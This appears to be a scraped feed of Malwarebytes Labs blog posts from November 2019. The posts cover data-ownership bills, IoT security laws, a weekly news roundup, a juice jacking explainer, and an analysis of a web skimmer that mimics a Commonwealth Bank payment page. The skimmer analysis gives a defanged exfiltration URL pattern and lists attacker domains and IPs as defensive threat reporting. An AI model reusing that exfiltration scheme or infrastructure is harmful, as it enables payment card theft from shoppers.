Finally, the actual money going into consumers’ pockets from a data property model might be a “pittance,” Tsukayama said. She added that, for the consumers who take the money, it isn’t worth the cost to their privacy.

“It’s a particularly pernicious form of privacy nihilism, where someone would say ‘Fine, do what you want, just throw me a little bit back,’” Tsukayama said, imagining a bargain in which consumers are fine with privacy invasions so long as they get a little bit of money.

So, if low-income communities are disproportionately harmed, and if consumers receive pennies, and if the sale of privacy becomes normalized for those pennies, who wins in this model?

According to Marlow, the “data agents”—organizations or companies that will facilitate the sale of consumers’ data to one company and then another company and then another. For every single step of those transactions, Marlow said, each data agent will get a cut of the sale, with consumers further down the line to get their share.

“If you get a cent and they get a nickel, and they do this hundreds of thousands of times, there’s real money to be made for them,” Marlow said.

He said there are already examples of these types of companies. He said he pushed back against one earlier this year, when a data property bill landed in Oregon.

 Data as property legislation

In the past year, the idea to treat data as property has escaped the niche audiences served by papers like the Wall Street Journal and the Harvard Business Review.

It’s now inspired lawmakers across the US.

For US Senators Mark Warner and Josh Hawley, who together introduced the DASHBOARD Act, giving consumers better transparency into the value of their data would better enable consumers to make informed decisions about what tech platforms to use. For Representative Doug Collins of Georgia, who proposed a bill to protect online privacy, giving the American people the right to own their data is a cornerstone to navigating the future economy.

But the clearest legislative push for data property rights landed in Oregon earlier this year in Senate Bill 703. Introduced by one state senator and two representatives, the bill was strongly supported by a company called Hu-manity.co, a seemingly small shop with the big idea that legal ownership of data property should be the next, universal human right.

In 2018, Hu-manity.co announced a way to try to provide consumers with that right: its own app, dubbed #My31 (there are currently 30 agreed-upon universal human rights per the United Nations). The app, which focuses strictly on medical data, gives consumers an option to declare how they would like that data to be used, including leasing, sharing, donating, or getting paid for it.

#My31, then, aligned perfectly with SB 703: A bill to allow Oregonians to sell their medical data for money.

Hu-manity.co was far from alone in supporting the bill; many similar companies submitted written testimony for lawmakers to consider. SB 703, the companies said, was a strong step toward protecting consumers’ rights to own and share their medical records as they see fit, potentially enabling them to better develop a comprehensive profile, no matter which hospitals or providers they’d used in the past. Further, some companies said, the ownership of medical data would also allow users to more easily donate that data to medical research.

Marlow saw the bill differently.

“Beware the tech industry’s latest privacy Trojan Horse,” he wrote in March.

“Hu-manity.co argues that, insofar as patient data is already being sold, its legislation is merely designed to give consumers ‘ownership’ of their data and a cut of the profits,” Marlow said. “But savvy bill readers will note that the proposed laws contain no defined percentage of the profits patients are entitled to, so they could receive mere pennies of Hu-manity.co’s revenue in return for giving up their privacy.”

Health Wizz, a company that also lets users control their medical data, wrote in its testimony: “We don’t need more privacy legislation,” but instead, better transparency.

Introduced in January, SB 703 is currently before the state Senate’s Joint Committee on Ways and Means.

Winners and losers

Depending on who you ask, the ability for consumers to own their data will produce one of two winners—consumers or corporations.

According to Mejias, the associate professor at SUNY Oswego, though, there is no reason to expect the data property model to solve our current privacy problems, it will only deepen them:

“The promise of a few more bucks at a time when social support systems are disappearing and inequality is rising would simply re-create an unequal system where those with more means can afford privacy and freedom, and those with less means are subjected to more intrusion, surveillance and quantification, which ultimately perpetuates their position.”

The post “Data as property” promises fix for privacy problems, but could deepen inequality appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (November 18 – 24)

Malware Bytes Security - Mon, 11/25/2019 - 7:55am

Last week on Malwarebytes Labs, we looked at stalkerware’s legal enforcement problem, announced our cooperation with other security vendors and advocacy groups to launch Coalition Against Stalkerware, published our fall 2019 review of exploit kits, looked at how Deepfake on LinkedIn makes for malign interference campaigns, rounded up our knowledge about the Disney+ security and service issues, explained juice jacking, analyzed how a web skimmer phishes credit card data via a rogue payment service platform, and lastly, we looked at upcoming IoT bills and guidelines.

Other cybersecurity news
  • Cybercriminals hitting US city and state governments with ransomware has become increasingly popular in recent times. Again, Louisiana has been targeted. (Source: TechSpot)
  • National Veterinary Associates was hit by a ransomware attack late last month that affected more than half of those properties. (Source: KrebsOnSecuirty)
  • After a deadline was missed for receiving a ransom payment, the group behind Maze Ransomware has published data and files stolen from security staffing firm Allied Universal. (Source: BleepingComputer)
  • A WhatsApp flaw that could let hackers steal users’ chat messages, pictures and private information by letting users download a video file containing malicious code. (Source: The DailyMail UK)
  • A malicious campaign is active that spoofs an urgent update email from Microsoft to infect user’s systems with the Cyborg ransomware. (Source: TechRadar)
  • Microsoft has invested $1 billion in the Elon Musk-founded artificial intelligence venture that plans to mimic the human brain using computers. (Source: Independent UK)
  • Unique data leak contains personal and social information of 1.2 billion people that appear to originate from 2 different data enrichment companies. (Source: DataViper)
  • The US branch of the telecommunications giant T-Mobile disclosed a security breach that, according to the company, impacted a small number of customers of its prepaid service. (Source: SecurityAffairs)
  • A hacker has published more than 2TB of data from the Cayman National Bank. This includes more than 640,000 emails and the data of more than 1400 customers. (Source: HeadLeaks)
  • A ransomware outbreak has besieged a Wisconsin based IT company that provides cloud data hosting, security and access management to more than 100 nursing homes across the United States. (Source: KrebsOnSecuirty)

Stay safe, everyone!

The post A week in security (November 18 – 24) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

IoT bills and guidelines: a global response

Malware Bytes Security - Fri, 11/22/2019 - 11:27am

You may not have noticed, but Internet of Things (IoT) rules and regulations are coming whether manufacturers want them or not. From experience, drafting up laws which are (hopefully) sensible and have some relevance to problems raised by current technology is a time-consuming, frustrating process.

However, it’s not that long since we saw IoT devices go mainstream—right into people’s homes, controlling real-world aspects of their day-to-day lives, and also causing mishaps and serious issues for people dealing with them.

The theoretical IoT wild west may be drawing to a close, so we’re taking a look at some IoT related bills and guidelines currently in the news.

Where did this all begin?

You’ve probably seen articles in the last few days talking about multiple upcoming changes and suggestions for IoT vendors, but in actual fact the first steps were taken last year when California decided the time was ripe for a little bit of IoT regulation.

If you sell or offer IoT devices, which count as any Internet-connected device in California, the device must be equipped with “reasonable security features.”

Bills, bills, bills

Here’s the text of the California bill.

The key parts are these:

“Connected device” means any device, or other physical object that is capable of connecting to the Internet, directly or indirectly, and that is assigned an Internet Protocol address or Bluetooth address.

A connected device is as wide ranging as you’d expect, so that’s a good thing considering anything from your printer to your refrigerator could be communicating with the big wide world outside.

That’s great—but what, exactly, is a reasonable security feature?

Next up:

(b) Subject to all of the requirements of subdivision (a), if a connected device is equipped with a means for authentication outside a local area network, it shall be deemed a reasonable security feature under subdivision (a) if either of the following requirements are met:

(1) The preprogrammed password is unique to each device manufactured.

(2) The device contains a security feature that requires a user to generate a new means of authentication before access is granted to the device for the first time.

We’re essentially in password town. If the shipped password is unique and not something you can plug a serial number into Google to discover, or the device owner is forced to create a unique password the first time they fire it up, that would count as “reasonable security.”

One small step for IoT

Is that enough, though? Some US-based legal eagles suggest it isn’t, and they may well have a point. If IoT legislation doesn’t end up considering things like secure communication, tampering, updates, or even what happens when a device is no longer supported, then this could become messy  quickly.

Even so, cheap devices with zero password functionality built in are commonplace and an absolute curse where trying to secure networks and keep users safe are concerned.

The California bill won’t just apply to devices being sold in California; it doesn’t matter where they’re made. If your password name isn’t down, you’re not getting in—for want of a better and considerably less mangled expression.

This is due to roll into action on the first of January 2020, not only in California but also Oregon. It seems the US is taking the potential for IoT chaos seriously and I’d be amazed if this doesn’t end up going live in additional states in the near future.

Tackling the IoT problem globally

It’s not just the US trying to get a grip on IoT. Australia just pushed out the voluntary code of practice: securing the Internet of Things for consumers [PDF]. Spread across 13 principles, it seems to be significantly more in-depth than the US bill, which so far leaves a lot of areas up for debate. The 13 principles tackle communication security, updates, the ability to easily scrub personal data, and more besides.

Of course, we should temper our expectations somewhat. The US bill goes live in two states only, and there doesn’t seem to be much (or any!) information with regards to punishment, fines, or anything else.

Additionally, you yourself as a consumer can’t do anything off the back of the bill directly. It would have to be the California Attorney General or similar stepping up to the plate. On the other hand, as impressive as the Australian code is—and it is still under consultation—it’s currently only voluntary.

Even so, getting people in a position of authority to think about these issues is important, and at the very least these guides will help people at home to make considered, informed decisions about the technology they allow into their homes on a daily basis. Some good first steps, then, but we have a long way to go.

The post IoT bills and guidelines: a global response appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Web skimmer phishes credit card data via rogue payment service platform

Malware Bytes Security - Thu, 11/21/2019 - 12:30pm

Heading into the holiday shopping season, we have been tracking increased activity from a threat group registering domains for skimming and phishing campaigns. While most of the campaigns implemented a web skimmer in the typical fashion—grabbing and exfiltrating data from a merchant’s checkout page to an attacker-controlled server—a new attack scheme has emerged that tricks users into believing they’re using a payment service platform (PSP).

PSPs are quite common and work by redirecting the user from a (potentially compromised) merchant site onto a secure page maintained by the payment processing company. This is not the first time a web skimmer has attempted to interfere with PSPs, but in this case, the attackers created a completely separate page that mimics a PSP.

By blending phishing and skimming together, threat actors developed a devious scheme, as unaware shoppers will leak their credentials to the fraudsters without thinking twice.

Standard skimmer

Over the past few months, we’ve tracked a group that has been active with web skimmer and phishing templates. As web security firm Sucuri noted, most of the domains are registered via the medialand.regru@gmail[.]com email address.

Many of their skimmers are loaded as a fake Google Analytics library called ga.js. One of several newly-registered domain names we came across had a skimmer that fit the same template, hosted at payment-mastercard[.]com/ga.js.

Figure 1: Simple skimmer based on previous template

This malicious ga.js file is injected into compromised online shops by inserting a one line piece of code containing the remote script in Base64 encoded form.

Figure 2: A JavaScript library from a compromised shop injected with the skimmer

However, one thing we noticed is that the payment-mastercard[.]com domain was also hosting a completely different kind of skimmer that at first resembled a phishing site.

Phish-like skimmer

This skimmer is interesting because it looks like a phishing page copied from an official template for CommWeb, a payments acceptance service offered by Australia’s Commonwealth Bank (https://migs.mastercard.com.au).

Figure 3: Fraudulent and legitimate payment gateways shown side by side

As the text reads “Your details will be sent to and processed by The Commonwealth Bank of Australia and will not be disclosed to the merchant” this is not a login page to phish credentials, but rather a pretend payment gateway service.

The attackers have crafted it specifically for an Australian store running the PrestaShop Content Management System (CMS), exploiting the fact that it accepts payments via the Commonwealth Bank.

Figure 4: Modes of payments accepted by the store

The scheme consists of swapping the legitimate e-banking page with the fraudulent one in order to collect the victims’ credit card details. We also noticed that the fake page did something we don’t always see with standard skimmers in that it checked that all fields were valid and informed the user if they weren’t.

Figure 5: Fake payment gateway page shown with its JavaScript that exfiltrates the data

Here’s how this works:

  • The fraudulent page will collect the credit card data entered by the victim and exfiltrate it via the payment-mastercard[.]com/ga.php?analytic={based64} URL
  • Right after, the victim is redirected to the real payment processor via the merchant’s migs_vpc module (MIGs VPC is an integrated payment service)
  • The legitimate payment site for Australia’s Commonwealth Bank is loaded and displays the total amount due for the purchase.
Figure 6: Web traffic showing data exfiltration process followed by redirect to legitimate PSP

Here’s the final (and legitimate) payment page displayed to the victim. Note how the total amount due from the purchase on the compromised shop is carried over. This is done by creating a unique session ID and reading browser cookies.

Figure 7: Legitimate payment gateway page used for actual payment of goods Web skimming in all different forms

Web skimming is a profitable criminal enterprise that shows no sign of slowing down, sparking authorities’ attention and action plans.

Externalizing payments shifts the burden and risk to the payment company such that even if a merchant site were hacked, online shoppers would be redirected to a different site (i.e. Paypal, MasterCard, Visa gateways) where they could enter their payment details securely.

Unfortunately, fraudsters are becoming incredibly creative in order to defeat those security defenses. By combining phishing-like techniques and inserting themselves in the middle, they can fool everyone.

Malwarebytes users are already protected against this particular scheme as the fraudulent infrastructure was already known to us.

Indicators of Compromise

payment-mastercard[.]com
google-query[.]com
google-analytics[.]top
google-smart[.]com
google-smart[.]com
google-payment[.]com
jquery-assets[.]com
sagepay-live[.]com
google-query[.]com
payment-sagepay[.]com
payment-worldpay[.]com

124.156.34[.]157
47.245.55[.]198
5.53.124[.]235

The post Web skimmer phishes credit card data via rogue payment service platform appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Explained: juice jacking

Malware Bytes Security - Thu, 11/21/2019 - 11:00am

When your battery is dying and you’re nowhere near a power outlet, would you connect your phone to any old USB port? Joyce did, and her mobile phone got infected. How? Through a type of cyberattack called “juice jacking.” Don’t be like Joyce.

Although Joyce and her infected phone are hypothetical, juice jacking is technically possible. The attack uses a charging port or infected cable to exfiltrate data from the connected device or upload malware onto it. The term was first used by Brian Krebs in 2011 after a proof of concept was conducted at DEF CON by Wall of Sheep. When users plugged their phones into a free charging station, a message appeared on the kiosk screen saying:

“You should not trust public kiosks with your smart phone. Information can be retrieved or downloaded without your consent. Luckily for you, this station has taken the ethical route and your data is safe. Enjoy the free charge!”

As peak holiday travel season approaches, officials have issued public warnings about charging phones via USB using public charging stations in airports and hotels, as well as pluggable USB wall chargers, which are portable charging devices that can be plugged into an AC socket. However, this attack method has not been documented in the wild, outside of a few unconfirmed reports on the east coast and in the Washington, DC, area.

Instead of worrying about juice jacking this holiday season, we recommend you follow our guidance on best cybersecurity practices while traveling. We’ve also written articles on how to protect your Android, as well as how to protect your iOS phone.

Still, it’s best to be aware of potential modes of cyberattack—you never know what will trigger the transformation of the hypothetical to the real. To avoid inadvertently infecting your mobile device while charging your phone in public, learn more about how these attacks could happen and what you can do to prevent them.

How would juice jacking work?

As you may have noticed, when you charge your phone through the USB port of your computer or laptop, this also opens up the option to move files back and forth between the two systems. That’s because a USB port is not simply a power socket. A regular USB connector has five pins, where only one is needed to charge the receiving end. Two of the others are used by default for data transfers.

USB connection table courtesy of Sunrom

Unless you have made changes in your settings, the data transfer mode is disabled by default, except on devices running older Android versions. The connection is only visible on the end that provides the power, which in the case of juice jacking is typically not the device owner. That means, anytime a user connects to a USB port for a charge, they could also be opening up a pathway to move data between devices—a capability threat actors could abuse to steal data or install malware.

Types of juice jacking

There are two ways juice jacking could work:

  • Data theft: During the charge, data is stolen from the connected device.
  • Malware installation: As soon as the connection is established, malware is dropped on the connected device. The malware remains on the device until it is detected and removed by the user.
Data theft

In the first type of juice-jacking attack, cybercriminals could steal any and all data from mobile devices connected to charging stations through their USB ports. But there’s no hoodie-wearing hacker sitting behind the controls of the kiosk. So how would they get all your data from your phone to the charging station to their own servers? And if you charge for only a couple minutes, does that save you from losing everything?

Make no mistake, data theft can be fully automated. A cybercriminal could breach an unsecured kiosk using malware, then drop an additional payload that steals information from connected devices. There are crawlers that can search your phone for personally identifiable information (PII), account credentials, banking-related or credit card data in seconds. There are also many malicious apps that can clone all of one phone’s data to another phone, using a Windows or Mac computer as a middleman. So, if that’s what hiding on the other end of the USB port, a threat actor could get all they need to impersonate you.

Cybercriminals are not necessarily targeting specific, high-profile users for data theft, either—though a threat actor would be extremely happy (and lucky) to fool a potential executive or government target into using a rigged charging station. However, the chances of that happening are rather slim. Instead, hackers know that our mobile devices store a lot of PII, which can be sold on the dark web for profit or re-used in social engineering campaigns.

Malware installation

The second type of juice-jacking attack would involve installing malware onto a user’s device through the same USB connection. This time, data theft isn’t always the end goal, though it often takes place in the service of other criminal activities. If threat actors were to steal data through malware installed on a mobile device, it wouldn’t happen upon USB connection but instead take place over time. This way, hackers could gather more and varied data, such as GPS locations, purchases made, social media interactions, photos, call logs, and other ongoing processes.

There are many categories of malware that cybercriminals could install through juice jacking, including adware, cryptominers, ransomware, spyware, or Trojans. In fact, Android malware nowadays is as versatile as malware aimed at Windows systems. While cryptominers mine a mobile phone’s CPU/GPU for cryptocurrency and drain its battery, ransomware freezes devices or encrypts files for ransom. Spyware allows for longterm monitoring and tracking of a target, and Trojans can hide in the background and serve up any number of other infections at will.

Many of today’s malware families are designed to hide from sight, so it’s possible users could be infected for a long time and not know it. Symptoms of a mobile phone infection include a quickly-draining battery life, random icons appearing on your screen of apps you didn’t download, advertisements popping up in browsers or notification centers, or an unusually large cell phone bill. But sometimes infections leave no trace at all, which means prevention is all the more important.

Countermeasures

The first and most obvious way to avoid juice jacking is to stay away from public charging stations or portable wall chargers. Don’t let the panic of an almost drained battery get the best of you. I’m probably showing my age here, but I can keep going without my phone for hours. I’d rather not see the latest kitty meme if it means compromising the data on my phone.

If going without a phone is crazy talk and a battery charge is necessary to get you through the next leg of your travels, using a good old-fashioned AC socket (plug and outlet) will do the trick. No data transfer can take place while you charge—though it may be hard to find an empty outlet. While traveling, make sure you have the correct adapter for the various power outlet systems along your route. Note there are 15 major types of electrical outlet plugs in use today around the globe.

Other non-USB options include external batteries, wireless charging stations, and power banks, which are devices that can be charged to hold enough power for several recharges of your phone. Depending on the type and brand of power bank, they can hold between two and eight full charges. Power banks with a high capacity are known to cost more than US$100, but offer the option to charge multiple devices without having to look for a suitable power outlet.

If you still want the option to connect via USB, USB condoms are adaptors that allow the power transfer but don’t connect the data transfer pins. You can attach them to your charging cable as an “always on” protection.

Image courtesy of int3.cc

Using such a USB data blocker or “juice-jack defender” as they are sometimes called will always prevent accidental data exchange when your device is plugged into another device with a USB cable. This makes it a welcome travel companion, and will only set you back US$10–$20.

Checking your phones’ USB preference settings may help, but it’s not a fool-proof solution. There have been cases where data transfers took place despite the “no data transfer” setting.

Finally, avoid using any charging cables and power banks that seem to be left behind. You can compare this trick to the “lost USB stick” in the parking lot. You know you shouldn’t connect those to your computer, right? Consider any random technology left behind as suspect. Your phone will thank you for it.

Stay safe, everyone!

The post Explained: juice jacking appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Pages